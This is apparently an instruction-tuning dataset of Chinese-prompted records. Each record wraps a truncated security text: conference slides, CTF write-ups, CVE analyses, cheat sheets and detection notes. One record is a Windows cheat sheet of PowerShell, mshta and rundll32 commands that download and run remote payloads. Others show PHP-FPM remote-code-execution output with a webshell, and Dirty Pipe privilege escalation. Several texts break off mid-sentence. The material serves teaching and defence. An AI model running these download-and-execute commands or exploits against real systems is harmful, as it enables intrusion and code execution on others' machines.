{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStratagem 1 \"Deceiving the heavens to cross the sea 瞒天过海 (Using the the 36 stratagems for Social Engineering) Jayson E. Street, CISSP, C|EH, GSEC, GCIH, GCFA, IEM, IAM, ETC Let go of my EGO Who Am I? defcon18@f0rb1dd3n.com Hacker/Social Engineer INFOSEC talk = slide like this ;-)  Sun Wu (Tzu) Ping-fa(The Art of War)  All warfare is based on deception. Hence, when able to attack, we must seem unable; when using our forces, we must seem inactive; when we are near, we must make the enemy believe we are far away; when far away, we must make him believe we are near. Hold out baits to entice the enemy. Feign disorder, and crush him. Contents  INTRO  History of the 36 Stratagems  History of Social Engineering  How S.E. differs between cultures  The new OSI model  Top 5 Stratagems relating to S.E.  Discussion The History of the 36 Stratagems Cooking = France Painting = Italy Military Strategy = China The History of Social Engineering From the beginning of time before it had a name it was being used as an effective form of attack. Amenhotep III The first Trojan attack Bards masters of the (S.E.) craft How S.E. differs between cultures Asia: Save face = Losing secrets Europe: Command = Control North America: Do unto others = Before they do to you South America: Mutual benefit = An uneven outcome The new OSI model Layer 1-6 is over used time for a new vector. Layer 7 good but getting better defended. Layer 8 less guarded and cant be patched ;-) Why use Layer 8? Credit to @jcran 3. \"Killing with a borrowed knife 借刀杀人 Turn an enemies asset against him (Let the employee be the attack vector) 3. \"Killing with a borrowed knife 借刀杀人 Cont 3. \"Killing with a borrowed knife 借刀杀人 Cont 3. \"Killing with a borrowed knife 借刀杀人 Cont oops 3. \"Killing with a borrowed knife 借刀杀人 Cont oops 3. \"Killing with a borrowed knife 借刀杀人 Cont 3. \"Killing with a borrowed knife 借刀杀人 Cont 3. \"Killing with a borrowed knife 借刀杀人 Cont 3. \"Killing with a borrowed knife 借刀杀人 Cont Thanks @jonoberheide 3. \"Killing", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# smash (pwn 388p, 9 solved) TL;DR 1. Leak locations of libc and stack by exploiting the format string vulnerability 2. Modify the CET configuration of the emulator by using the write primitive from the stack buffer overflow 3. Execute shell with ROP sequence from the stack buffer overflow ## Analysis In the task we get: * [64-bit Linux executable](smash) of the server application, * libc shared library, * \"Software Development Emulator\" from Intel that reports version \"8.56.0 external\" and * the following loader script: ``` #!/bin/sh cd `dirname $0` echo \"Now loading...\" env -i ./sde/sde64 -no-follow-child -cet -cet_output_file /dev/null -- ./smash ``` The server application includes two vulnerabilities that are easy to spot. The first vulnerability is that unsanitized user input is passed as the format parameter when calling `__dprintf_chk` at 0x126B: ``` .text:122C lea rsi, aInputName ; \"Input name > \" .text:1233 mov edi, 1 .text:1238 mov eax, 0 .text:123D call dprintf@plt .text:1242 mov esi, 20h ; read_size .text:1247 mov edi, 0 ; buffer .text:124C call sub_12E7 ; read string .text:1251 mov [rbp+user_input], rax .text:1255 mov rax, [rbp+user_input] .text:1259 mov rdx, rax ; format .text:125C mov esi, 1 .text:1261 mov edi, 1 .text:1266 mov eax, 0 .text:126B call __dprintf_chk@plt ``` An attacker could exploit this format string vulnerability to leak content of the application stack. The second vulnerability is that subroutine `sub_12E7` allocates stack buffer of insufficient size when called at 0x1290 and 0x12C9: ``` .text:1286 mov esi, 38h ; read_size .text:128B mov edi, 0 ; buffer .text:1290 call sub_12E7 ; read string .text:1295 mov [rbp+user_input], rax .text:1299 mov rax, [rbp+user_input] .text:129D movzx eax, byte ptr [rax] .text:12A0 or eax, 20h .text:12A3 cmp al, 'y' .text:12A5 jnz short l_message_done .text:12A7 lea rsi, aInputMessage ; \"\\nInput message > \" .text:12AE mov edi, 1 .text:12B3 mov eax, 0 .text:12B8 call dprintf@plt .text:12BD mov rax, [rbp+u", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeaponize Your Feature Codes By MasterChen Who Am I?  GreyNoise Podcast Co-Founder and Co-Host https://greynoi.se  SYNShop Hackerspace member http://synshop.org  2014 & 2016 BSidesLV Speaker  What I Learned As A Con Man  A Peek Behind Vegas Surveillance  2015 DC Skytalks Speaker  Automate Your Stalking  2600: The Hacker Quarterly  Asterisk: The Gatekeeper  Asterisk: The Busybox Why this talk?  I became enamored with phone phreaking after DEF CON 15, but I missed the boat!  Wait phreaking isnt dead! We have VoIP!  Todays focus  Call flooding using feature codes  SMS flooding using feature codes  Caller ID spoofing using feature codes  Potential for even more features Basic Terminology  Vertical Service Code (aka Star Code, Feature Code): is a special code dialed that engages some type of special telephone service  Private Branch eXchange (PBX): telephone exchange/switching system that serves a private organization and performs concentration of central office lines or trunks and provides intercommunication between a large number of telephone stations in the organization. The History of the Feature Code  Developed by AT&T; Custom Local Area Signaling Service (CLASS) in 1960s & 70s  CLASS was an AT&T trademark, so vertical service code was adopted by North American Numbering Plan Administration  Called vertical because the codes were used on the local Central Office (CO) and not horizontally to a different telephone company Our Feature Codes North American Numbering Plan Administration (NANPA) What Do We Mean By Weaponize?  Weaponize (v.): convert to use as a weapon  Feature codes arent inherently malicious  Scope of damage  Simple annoyance to business and personal relationship disruption Materials You Will Need  Linux machine  Asterisk Software PBX by Digium installed on that Linux Machine  VoIP service provider (Vitelity, Bandwidth, Ring Central, etc)  Hard/Soft phone registered with your PBX  Imagination The Structure of Our Feature Codes  [context-label] : This den", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAndrosia Securing 'data in process' for your Android Apps C:\\>whoami  Samit Anwer  Product Security Team @Citrix R&D India Pvt Ltd  Web/Mobile App Security Enthusiast  Speaker:  AppSec USA (Orlando, USA) 2017,  c0c0n (Cochin, India) 2017,  CodeBlue (Tokyo, Japan) 2017,  IEEE Services (Anchorage, Alaska) 2014,  ACM MobileSOFT, ICSE (Hyderabad, India) 2014,  IEEE CloudCom (Bristol, UK) 2013 Email: samit.anwer@gmail.com, Twitter: @samitanwer1, LinkedIn: https://www.linkedin.com/in/samit-anwer-ba47a85b/ Which one is the most difficult to protect? Data at Rest 1 Data in Process 2 Data in Motion 3 Motivation Want to ensure objects content gets cleared? Myth: Forgotten References Memory Leak Unreachable objects Garbage Reachable objects Garbage Collection Roots Ref: https://www.dynatrace.com/resources/ebooks/javabook/how-garbage-collection-works/ Reality: Resetting StringBuilder objects  Reachable, unused StringBuilder objects may contain sensitive information  A heap dump will reveal the sensitive info  Dont just rely on GC to clear sensitive content  Destroy by overwriting all critical data Ref: https://www.pentestpartners.com/security-blog/how-to-extract-sensitive-plaintext-data-from-android-memory java.security.* falls short Ref: https://docs.oracle.com/javase/7/docs/api/java/security/KeyStore.PasswordProtection.html How does Androsia help?  Androsia determines last use of objects at a whole program level  A summary based inter-procedural data-flow analysis  Androsia instruments bytecode to clear memory content of objects 8 1 2 3 4 5 6 7 9 10 def x use x def x use x second initialization Eclipse Memory Analyzer Heap Dump - Before Instrumentation Heap Dump - After Instrumentation 6. Repack & Sign APK or Provide Analysis Results 1. Shares source OR APK 2. Unpack Developer / User of the app Server 3. Convert Androsia 5. Convert 4. Transform/Instrument Jimple Code Dex 7. Transformed APK/Results Overview Framework behind Androsia Static Code analysis using Soot  Soot - fram", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n浅析Apache Commons Jxpath命令执分 析(CVE-2022-41852) 影响版本 commons-jxpath:commons-jxpath <= 1.3 直到最新版本官也不打算修了 利探索 测试环境jxpath1.3 JXPath持标准的XPath函数开箱即它还持 \"标准 \"扩展函数这些函数基本上是通往 Java的桥梁以及完全定义的扩展函数 简单从漏洞描述可以看出由于解析xpath表达式的问题造成的漏洞 其实这来源官的个feature如图看起来它赋予了我们种动态执代码的能 这时候我们就会想为什么会有这种奇怪的需求毕竟从平时经验来讲xpath作为种路径语 它的功能是帮助我们对xml进些简单的信息检索然它叫JXpath不叫Xpath因此 其实从实现上来讲它不仅实现了xpath查询的些基础功能更重要的是它搭建了个通往 java的桥梁从官的设计初衷也可以看出它的设计实现其实更像款表达式语 Primary applications of JXPath are in scripting: JSP and similar template/script based technologies. However, programmers who prefer XML-flavored APIs, should consider JXPath as an alternative to other expression languages as well. JXPath is a must-have tool for those who work with mixtures of Java objects and XML and need to frequently traverse through graphs of those. 简单的测试 简单写个测试demo Test.java Calc.java 对于如何解析其实很多时候我们并不需要去关注对字符token的解析过程毕竟我们这也不是 绕waf我们也不需要知道如何去实现些畸形构造达到致的功能在这我们更应该关 注什么呢我们应该关注它官这个feature如何实现的调以及调法对法又有什么限 制 在 org.apache.commons.jxpath.PackageFunctions#getFunction 当中 import org.apache.commons.jxpath.JXPathContext; public class Test { public static void main(String[] args) { JXPathContext context = JXPathContext.newContext(null); context.getValue(\"com.example.springdemo.calc.calc()\"); } } package com.example.springdemo; public class calc { public static void calc(){ try { Runtime.getRuntime().exec(\"open -na Calculator\"); }catch (Exception e ){ } } } 这可以看出允许的调个是构造函数另个是静态法当然他们都需要是public修饰 再次回 到 org.apache.commons.jxpath.ri.compiler.ExtensionFunction#computeValue 当 中, 在获得了org.apache.commons.jxpath.Function对应的这个实例后回去调具体的invoke的实现 Function具体的接实现有两个类 org.apache.commons.jxpath.functions.ConstructorFunction org.apache.commons.jxpath.functions.MethodFunction 如何判断返回的是哪个类 ConstructorFunction 的 invoke 就不多说了实例化构造函数另 个 MethodFunction#invoke 反射执法都没什么好说的 那么我们假设就从官的demo出发我们能做些什么 对于实例化我们能做什么 如说对于new这个操作来说些常见的如spring当中有两个类构造函数就能加载远程配置 可以rce org.springframework.context.support.ClassPathXmlApplicationContext org.springframework.context.support.FileSystemXmlApplicationCont", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Mitmproxy date: 2020-12-22 20:10:08 background: bg-[#d86138] tags: - capture - traffic - network - utility categories: - Toolkit intro: | [mitmproxy](https://mitmproxy.org/) is a free and open source interactive HTTPS proxy. This is a quick reference cheat sheet to the mitmproxy. plugins: - copyCode --- Getting Started --------------- ### Usage {.col-span-2} | Option | Example | Description | |--------|----------------------------------------------------|-------------------------------------------| | `-p` | mitmproxy -p 8001 | Start proxy on port 8001 | | `-m` | mitmproxy -p 8001 -m reverse:http://127.0.0.1:4000 | Reverse proxy on port 8001 to port 4000 | | `-w` | mitmproxy -p 8001 -w traffic.mitm | Stream flows to file as they arrive | | `-r` | mitmproxy -r traffic.mitm | Read flows from file | | `-C` | mitmproxy -C traffic.mitm | Replay client requests from a saved file | | `-S` | mitmproxy -S traffic.mitm | Replay server responses from a saved file | | `-s` | mitmproxy -s myScript.py | Execute a script | | `-h` | mitmproxy -h | mitmproxy quick help | ### Movement ```markdown k Ctrl b     h   +   l  page     j Ctrl f / Space ``` --- | - | - | |----------------------|-----------------------| | `h`, `j`, `k` ,`l` | Left, Down, Up, Right | | `Ctrl` `b` | Page up | | `Space` / `Ctrl` `f` | Page down | | `g` / `G` | Go to beginning / end | | `Arrows` | Up, Down, Left, Right | {.shortcuts} ### Copy to Clipboard Command Syntax: ``` :export.clip format flow ``` ---------------- Example: | Description | Command Example | |--------------------------------|------------------------------------| | 1. Copy as a curl command | `:export.clip curl @focus` | | 2. Copy as a httpie | `:export.clip httpie @focus` | | 2. Copy as a raw | `:export.clip raw @focus` | | 2. Copy as a raw HTTP request | `:export.clip raw_request @focus` | | 2. Copy as a raw HTTP response | `:export.clip raw_response @focus` | {.style-list} Export a flow to the system clipboard. ### Save to File Co", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Windows - Download and execute methods ## Downloaded files location - C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\ - C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\<subdir> - C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV ## Powershell From an HTTP server ```powershell powershell -exec bypass -c \"(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex\" # Download only (New-Object System.Net.WebClient).DownloadFile(\"http://10.10.10.10/PowerUp.ps1\", \"C:\\Windows\\Temp\\PowerUp.ps1\") Invoke-WebRequest \"http://10.10.10.10/binary.exe\" -OutFile \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\binary.exe\" # Download and run Rubeus, with arguments $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/Rubeus.exe') $assem = [System.Reflection.Assembly]::Load($data) [Rubeus.Program]::Main(\"s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt\".Split()) # Execute a specific method from an assembly $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/lib.dll') $assem = [System.Reflection.Assembly]::Load($data) $class = $assem.GetType(\"ClassLibrary1.Class1\") $method = $class.GetMethod(\"runner\") $method.Invoke(0, $null) ``` From a Webdav server ```powershell powershell -exec bypass -f \\\\webdavserver\\folder\\payload.ps1 ``` ## Cmd ```powershell cmd.exe /k < \\\\webdavserver\\folder\\batchfile.txt ``` ## Cscript / Wscript ```powershell cscript //E:jscript \\\\webdavserver\\folder\\payload.txt ``` ## Mshta ```powershell mshta vbscript:Close(Execute(\"GetObject(\"\"script:http://webserver/payload.sct\"\")\")) ``` ```powershell mshta http://webserver/payload.hta ``` ```powershell mshta \\\\webdavserver\\folder\\payload.hta ``` ## Rundll32 ```powershell rundll32 \\\\webdavserver\\folder\\payload.dll,entrypoint ``` ```powershell rundll32.exe ja", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PHP-FPM Remote Command Execution (CVE-2019-11043) [中文版本(Chinese version)](README.zh-cn.md) There is a PHP remote code execution 0-Day discovered in Real World CTF 2019 Quals. > Real World CTF 2019 Quals is a CTF challenge which was organized by Chaitin Tech in China. References: - https://bugs.php.net/bug.php?id=78599 - https://lab.wallarm.com/php-remote-code-execution-0-day-discovered-in-real-world-ctf-exercise/ - https://github.com/neex/phuip-fpizdam ## Environment setup Start a vulnerable PHP server through following command: ``` docker compose up -d ``` After the environment is started, you can see the default page at `http://your-ip:8080/index.php`. ## Vulnerability Reproduce Use this tool to reproduce the vulnerability, <https://github.com/neex/phuip-fpizdam>: ``` $ go run . \"http://your-ip:8080/index.php\" 2019/10/23 19:41:00 Base status code is 200 2019/10/23 19:41:00 Status code 502 for qsl=1795, adding as a candidate 2019/10/23 19:41:00 The target is probably vulnerable. Possible QSLs: [1785 1790 1795] 2019/10/23 19:41:02 Attack params found: --qsl 1790 --pisos 152 --skip-detect 2019/10/23 19:41:02 Trying to set \"session.auto_start=0\"... 2019/10/23 19:41:02 Detect() returned attack params: --qsl 1790 --pisos 152 --skip-detect <-- REMEMBER THIS 2019/10/23 19:41:02 Performing attack using php.ini settings... 2019/10/23 19:41:02 Success! Was able to execute a command by appending \"?a=/bin/sh+-c+'which+which'&\" to URLs 2019/10/23 19:41:02 Trying to cleanup /tmp/a... 2019/10/23 19:41:02 Done! ``` Something is show that the process is finished successfully: ![](1.png) A webshell is written in the background of PHP-FPM, visit `http://your-ip:8080/index.php?a=id` to trigger RCE: ![](2.png) You should notice that only part of the PHP-FPM child process is polluted, so please try a few more times to execute the command.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nApproved for Public Release, Distribution Unlimited 1 Approved for Public Release, Distribution Unlimited 2 Approved for Public Release, Distribution Unlimited 3 Approved for Public Release, Distribution Unlimited 4 Approved for Public Release, Distribution Unlimited 5 Approved for Public Release, Distribution Unlimited 6 Approved for Public Release, Distribution Unlimited 7 Approved for Public Release, Distribution Unlimited 8 Approved for Public Release, Distribution Unlimited 9 Approved for Public Release, Distribution Unlimited 10 Approved for Public Release, Distribution Unlimited 11 Approved for Public Release, Distribution Unlimited 12 Approved for Public Release, Distribution Unlimited 13 Approved for Public Release, Distribution Unlimited 14 Approved for Public Release, Distribution Unlimited 15 Approved for Public Release, Distribution Unlimited 16 Approved for Public Release, Distribution Unlimited 17 Approved for Public Release, Distribution Unlimited 18 Approved for Public Release, Distribution Unlimited 19 Approved for Public Release, Distribution Unlimited 20 Approved for Public Release, Distribution Unlimited 21 Approved for Public Release, Distribution Unlimited 22 Approved for Public Release, Distribution Unlimited 23 Approved for Public Release, Distribution Unlimited 24 Approved for Public Release, Distribution Unlimited 25 Approved for Public Release, Distribution Unlimited 26 Approved for Public Release, Distribution Unlimited 27", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMy Life As A Spyware Developer Why Im Probably Going to Hell Who Am I  Integrated Solu2ons Lead for Matrikon Toronto/Chicago  Custom so=ware for Power Plants  NERC CIP for the past year or so  Previously developed Pharmacy systems, online casinos, da2ng websites  And spyware Who Was I?  Just a programmer with no security/spyware background whatsoever  Was broke  Found the job on Craigslist  Hired as Product Designer\\Lead Developer for a spyware company  5 other programmers  Please dont punch me Features  Client Applica2on  Run any applica2on we wanted  Add links, icons, shortcuts  Change homepage search provider  Keyword search popups and hyperlinking  Check for updates daily  Server  Track installs and updates  Manage Mul2ple Campaigns  Upload new versions Polymorphic Installs  Random filenames and loca2ons  Random file contents to get by hash checks  While I worked there, no malware protec2on so=ware was able to remove it  Had started looking into hiding the files in Alternate Data Streams Affiliate Hijacking  Abusing affiliate site referrals  If you went to a site in our list, you got redirected through our affiliate link  We would get commission off anything purchased  Hundreds of affiliates Kernel Module  Probably called a root kit now  Hide all the files from the user  If they were deleted, they would be immediately replaced and randomized once more Technology Used  Client Side  Internet Explorer Plugin (Browser Helper Object hooks)  Visual C++ 6  Server Side  PHP Interface  MySQL How Does This Get Installed?  My boss said he would pay $10k to whoever found  Exploits IE Flaw  Our exploit required two things  Get the file on the computer and out of protected IE zones  Run the file  I found one that was able to do this using a custom .chm file and exploit in Windows Media Player  Was unpatched un2l XP SP2  Not Illegal  However, we covered our backs with a custom installa2on dialog  My boss never paid the $10k Installa2on  Standard IE 6 Installer Installa2on  Custom installer  B", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Mass Assignment Attack ## Introduction Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS ## How to exploit - Normal request ``` POST /editdata HTTP/1.1 Host: target.com ... username=daffa ``` The response ``` HTTP/1.1 200 OK ... {\"status\":\"success\",\"username\":\"daffainfo\",\"isAdmin\":\"false\"} ``` - Modified Request ``` POST /editdata HTTP/1.1 Host: target.com ... username=daffa&admin=true ``` ``` HTTP/1.1 200 OK ... {\"status\":\"success\",\"username\":\"daffainfo\",\"isAdmin\":\"true\"} ``` ## References * [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLive-Fire Exercise: Baltic Cyber Shield 2010 Kenneth Geers Naval Criminal Investigative Service (NCIS) Cooperative Cyber Defence Centre of Excellence (CCD COE) Overview  May 10-11, 2010  International cyber defense exercise (CDX)  CCD CoE / Swedish National Defence College  Six Blue Teams  Northern European gov, mil, priv sec, acad  Red Team  20 friendly hackers  Scenario  Cyber terrorists vs power generation companies Baltic Sea Sweden Estonia Tallinn, Estonia 2007: Street Disturbances 2007: Cyber Attack CCD CoE Introduction  Are cyber attacks a threat to national security? Cyber terrorism, cyber warfare  Expert opinions  Dismissive to apocalyptic  What would the targets be? Electricity, water, air traffic control, stock ex- change, national elections Trends  National critical infrastructures increasingly connected to the Net  Custom IT systems replaced with less expensive, off-the-shelf Windows and UNIX  Traditionally closed networks (eg SCADA) not designed for resiliency  OS familiarity may facilitate hacking Natl Security Thinking  Cyber attacks: better understanding required  Some real-world case studies  Much information lies outside public domain  No wars yet between two Internet-enabled militaries  Must be able to simulate cyber attack and defense in a laboratory Moving Target  Realistic CDXs are a challenge  Must simulate adversary, friendly forces, even the battlefield  Conclusions may be valid for a short time  IT, hacking are complex and dynamic  Rapid proliferation of computing devices, processing power, user-friendly hacker tools, practical encryption, Web-enabled intelligence collection Half-Life  The military and computers  Train tank drivers, pilots  Simulate battles, campaigns, complex geopolitical scenarios  How well can a sim model the real world?  Failure factors  Poor intelligence, miscalculations, incorrect assumptions, scoring system, political considerations  2002: $250 million Millennium Challenge Cyber Defense Exercise  Robust CDX requires", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Terminator to Android Hardening Services Yueqian Zhang, Xiapu Luo, Haoyang Yin Department of Computing The Hong Kong Polytechnic University 1 2 Source: Trend Micro Percentage of top 10 apps in each category which have repacked version: 100% of the apps of Widgets, Media & Video, etc. 90% of the apps of Business, Music & Audio, etc.  3 Outline Background DexHunter Analysis of major products Related work 5 Outline Background DexHunter Analysis of major products Related work 6 Dex File Java source code -> Java class -> dex Java class: each file contains one class dex: one file contains all classes Reorganize constant pools in each class file into shared and type-specific constant pools 7 Dex File The executable of an App. The header contains the length and the offset for each section. class_defs section contains class_def_items, each of which describes a class. 8 class_def_item A class_def_item points to a class_data_item. A class_data_item contains the data of a class. Each method is described by an encoded_method. An encoded_method points to a code_item. A code_item contains the instructions of a method. 9 OAT File It is generated while an app is installed or a jar file is loaded. /frameworks/base/services/java/com/android/server/pm/Packa geManagerService.java Constructor method  scanDirLI () scanPackageLI()performDexOptLI()mInstaller.dexopt() It is an ELF file. 10 OAT File Three symbols in dynamic section. oatdata oatexec oatlastword The original dex file is contained in the oatdata section. The compiled native instructions are contained the oatexec section. 11 Outline Background DexHunter Where to unpack the app? When to unpack the app? How to unpack the app? Analysis of major products Related work 12 Where to dump dex file? Four occasions Opening a Dex file; Loading a class; Initializing a class; Invoking a method; 13 Opening a Dex File Operations Open an APK file; Check whether it has been cached; If not, extract the dex file from the APK and generate the cac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1562-003-linux-Histcontrol ## 来自ATT&CK的描述 在HISTCONTROL环境变量决定了是否保存history命令并最终进入~/.bash_history用户登录时出的文件可以将此设置配置为忽略以空格开头的命令只需将其设置为ignorespace即可HISTCONTROL也可以设置为忽略重复命令其使用方法是将其设置为ignoredups在某些Linux系统中默认设置为ignoreboth它涵盖了前面的两个示例这意味着ls将不会被保存但ls将被历史保存HISTCONTROL默认情况下在macOS上不存在但可以由用户设置并且将受到保护攻击者可以通过简单的在其所有终端命令之前添加空格来使用它进行操作操作而不留下痕迹 ## 测试案例 export HISTCONTROL=ignoreboth ## 检测日志 bash历史记录 ## 测试复现 ```bash icbc@icbc:/$ ls icbc@icbc:/$ history 1 ls icbc@icbc:/$ export HISTCONTROL=ignoreboth icbc@icbc:/$ ls ``` ## 测试留痕 ```bash icbc@icbc:/$ history 1 ls 2 export HISTCONTROL=ignoreboth 3 history ``` ## 检测规则/思路 ### splunk规则 index=linux sourcetype=\"bash_history\" export HISTCONTROL | table host, user_name, bash_command ### 建议 暂无 ## 参考推荐 MITRE-ATT&CK-T1562-003 <https://attack.mitre.org/techniques/T1562/003/> linux history命令详解 <https://www.cnblogs.com/keithtt/p/7040549.html>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n影响版本: Linux Kernel版本 >= 5.8 Linux Kernel版本 < 5.16.11 / 5.15.25 / 5.10.102 漏洞点是在 splice 系统调用中未清空 pipe_buffer 的标志位从而将管道页面可写入的状态保 留了下来这给了我们越权写入只读文件的操作 攻击者利用该漏洞可以覆盖任意只读文件中的数据这样将普通的权限提升至root权限 内核提权 漏洞能覆盖任意可读文件也有一些限制不能覆盖第一个字节和最后一个不能填入 \\x00 写入大 小最多为linux 页 的大小 利用可以写 /etc/passwd 新加一个root或修改root用户也可以写到 corntab  sudo文件 ,sudo文件 可以写入bash或修改elf入口点 做了一个自动化工具能一键提权原理是利用漏洞修改了 /etc/passwd 1. exp会自动 检查版本 ,符合内核的版本才会继续执行,会覆写 /etc/passwd 中root将root密码置为 空达到提权工具结束后会恢复 /etc/passwd 2. 直接运行exp会弹回一个root权限的shell 3. ./exp -c whoami # 以root权限执行命令 Docker 逃逸 结合 CVE-2019-5736 达到docker逃逸效果参考 https://mp.weixin.qq.com/s/VMR_kLz1tAbHrequa2 OnUA 也做了自动化工具基本原理是 循环获取runc的进程获取runc入口点偏移利用dirtypipe写入runc 入口点shellcode需要完成自动获取入口点偏移和自动生成shellcode (已经完成) 利用条件比较苛刻 拥有docker内的root权限 需要外部执行两次 docker exec 可能只需要一次但是没调出来 自动化利用程序演示", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n使用静态代码检测微服务越权未授权访问漏洞 作者xsser 背景 现在的互联网很多都是来自阿里那一套公司的整体的应用的架构都 是微服务在微服务下基于 spring boot 之类的搭建了 一套开发体 系在历史的发展下微服务一般发展成这样的架构 安全做为一个属性需要深入契合这个框架为什么要讲微服务呢 因为有统一的框架可以通过静态代码去一些事情外购的系统不 能接入到微服务里的我们没办法拿到源代码也自然无法做静态代 码的事情 难以解决的安全问题 当今在越来越完善的 SDLC 安全建设之下很多安全问题已经逐步变 少例如 SQLIRCE 等企业的安全建设在研发安全方面已经逐步完 善常见的 WEB 漏洞已经开始降低但是有一种漏洞难以解决且 是常见的 SRC 的高分漏洞那就是越权漏洞 2 使用静态代码工具的数据流来检测越权漏洞 相比传统的静态代码检查工具例如 sonarpmd 等现代的静态代 码检查工具多了一些比如数据流的能力通过图结构的数据查询使得 发现安全漏洞成为了新的能力传统的静态代码扫描工具仅仅是对代 码质量的检测检查固定格式的代码 下面我就以 CodeQL 这个现代化的静态代码扫描工具来举例 首先我们从业务角度去思考一个越权的特征 1) 请求包中的 GET 参数或者 POST 参数中带有*Id字样 2) 未使用用户微服务对 request 的 id 解析 3) 查询敏感数据或更新数据中的 SQL 语句和 id 等进行了拼接 对这样的场景的抽象我们就不难写出一个 QL 第 1 条很好理解在 ql 里有一个来自 remoteFlowSource 的类可以满 足这个需求 第 2 条没有使用用户微服务是什么意思呢其实就是当一个参数 传递进来并且没有数据流经过用户服务换句话就是未使用用户服务 团队提供的 request 解析 api 进行解析(一般用户服务会提供一些 api 来解析 request 的登陆态并返回这个 request 的 id 值)这里既然没 雨用到用户服务的解析自然就不会拿到 id 第 3 条是说这个应用有数据库查询功能比如更新订单查询订单的 敏感信息也就是常见的 CURD在这个查询中一般会带一个条 件就是where id = ?这里的 id 就是从用户传递过来的对象中 拿到的而非用户服务解析出来的 如何编写这样的 QL 呢 首先我们肯定需要 dataflow 模块 然后我们需要 remoteflowSource 然后需要描述 remoteflowsource->用户服务这个这个数据流的关系 再然后我们需要描述 remoteflowsource->*query(sql+id)中的 id 和 remoteflowsource 之间的关系 3 最后把上面的步骤通过 and 或者 or 组合起来就可以正确的表达了 最后我简单的画个图来表达我的思路 看到这里是不是觉得越权也可以实现并不是很难 其实只要用关系性图数据库查询就可以解决漏洞了把越权抽象出 来通过图语言去描述这个过程即可 使用静态代码工具的数据流来检测未授权访问漏洞 看过上面的越权检测相信这个未授权访问非常容易检测 首先抽象未授权访问的过程 1) 未使用了用户服务例如@getLoginIdWithReq 2) 使用了*query 的 jdbc 查询 3) 查询的 sql 中包含 emailphone 等字段 满足以上这样的抽象条件的接口可能不需要登陆就可以返回敏感信 息导致信息泄露 所以我们的 QL 应该这样写 1. 用到 remoteflowsource 类 2. 查询那些没有@ getLoginIdWithReq 的方法 4 3. 且方法里有各种 daodao 里有 sql 模板拼接 email 或 phone 或其 他敏感信息字段 效果如何 本人在抽空实践中成功实现了一个标准的微服务下的越权检测(通过 src 的漏洞) 朋友经过和我的讨论也实现了这个方法在不精细的检测中实现了 8K 个随机接口挖到了 150 个越权 可能存在的坑 数据流断开我 一般使用 2 分法定位断开不过现在 CodeQL 有更好 的测试方法了网上也有人公开了其检测方法 缺乏 sourcesink这个就不说了 自己去发现和积累 常见的 不准确的静态代码扫描的坑这个可以通过长期的反复复盘 积累一定的 isAddtionalStep 去手动链接断点这个对 ql 语言熟悉程 度有较高的要求在复杂对象结构下要精准描述还要带上上下文去 描述有的时候甚至多个 flow会比较麻烦还要精简 ql否则规则 复杂会导致查询变慢 缺点 较长的查询时间这个也是常见的静态代码扫描的问题毕竟复杂的 表达式摆在那 说说我是如何思考的 其实我就是简单的去思考这个越权的过程和其他漏洞的差异无非 就是把这个业务的逻辑说清楚那么整个逻辑", "category": "text_analysis", "source": "security_papers"}
